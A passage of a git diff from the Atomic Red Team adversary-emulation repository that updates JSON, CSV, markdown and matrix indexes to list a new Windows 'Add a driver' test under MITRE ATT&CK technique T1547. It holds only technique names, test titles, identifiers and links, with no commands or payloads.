Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 01e8bc05..e8436c52 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -165,6 +165,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v
 privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -632,6 +633,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b504ab75..e18fe94d 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -108,6 +108,7 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -428,6 +429,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 599eca55..e2170ff3 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -271,7 +271,8 @@
   - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
   - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -998,7 +999,8 @@
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
   - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 0b9cc997..bbea0278 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -198,7 +198,8 @@
   - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
   - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -709,7 +710,8 @@
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
   - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 627b59a2..b19fcb7d 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -12,9 +12,9 @@
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index cf4b2f95..70bdda60 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -11,7 +11,7 @@
